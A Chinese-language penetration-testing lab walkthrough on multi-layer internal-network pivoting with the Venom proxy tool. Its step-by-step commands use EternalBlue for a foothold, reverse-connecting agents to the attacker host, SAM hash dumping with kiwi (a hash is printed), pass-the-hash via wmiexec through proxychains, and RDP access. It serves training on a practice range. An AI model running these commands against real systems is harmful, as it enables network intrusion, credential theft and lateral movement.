实际操作视频地址请移步
https://www.bilibili.com/video/BV1x24y1o7WC/
venom 三层内网穿透
Venom是一款为渗透测试人员设计的使用Go开发的多级代理工具。
特点是部署简洁轻松,有网络拓扑和节点控制。
下载地址
https://github.com/Dliv3/Venom/releases/tag/v1.1.0
靶场拓扑图
部署步骤:
1.kali上执行venom,本地监听9999端口
#./admin_linux_x64 -lport 9999
2.利用永恒之蓝获取win7-1的shell,上传agent.exe,并执行
meterpreter > execute -f "c:\windows\temp\agent.exe -rhost 192.168.1.5 9999"
3.在跳板机win7-1上,获取administrator的hash,后面用pth攻击win2012
meterpreter > load kiwi
meterpreter > lsa_dump_sam
记下administrator的hash,lm:ntlm形式41c3fc4a0f0950659a67bb2340a5f2dd:ccef208c6485269c20db2cad21734fe7
4.venom的(admin node) 节点下执行命令show
5.venom的(admin node) 节点下执行命令 goto 1
6.在node 1执行socks 1080,在kali 192.168.1.5上监听1080端口
(node 1) >>> socks 1080
7.设置代理proxychains
vi /etc/proxychains4.conf
socks5 192.168.1.5 1080
8.用wmiexec.py工具利用pth通过proxychains攻击win2012 10.10.10.13
proxychains python wmiexec.py administrator@10.10.10.13 -hashes 41c3fc4a0f0950659a67bb2340a5f2dd:ccef208c6485269c20db2cad21734fe7 -codec gbk
8.1上传agent.exe到win2012 10.10.10.13上
9.在win7-1上执行监听9998端口
(node 1) >>> listen 9998
10.在win2012 10.10.10.13上执行agent.exe,反向链接win7-1 10.10.10.7的9998端口
C:\windows\temp>agent.exe -rhost 10.10.10.7 -rport 9998
11.在venom 上操作去节点2,并执行socks 1081 ,在kali上监听1081端口
(node 1) >>> goto 2
(node 2) >>> socks 1081
12.设置代理工具proxychains的代理端口为1081
13.通过代理工具proxychains远程链接10.10.20.7,成功
proxychains rdesktop 10.10.20.7
现在完成二层网络穿透,如果完成三层或者四层内网穿透,也是重复同样的步骤
https://www.bilibili.com/video/BV1x24y1o7WC/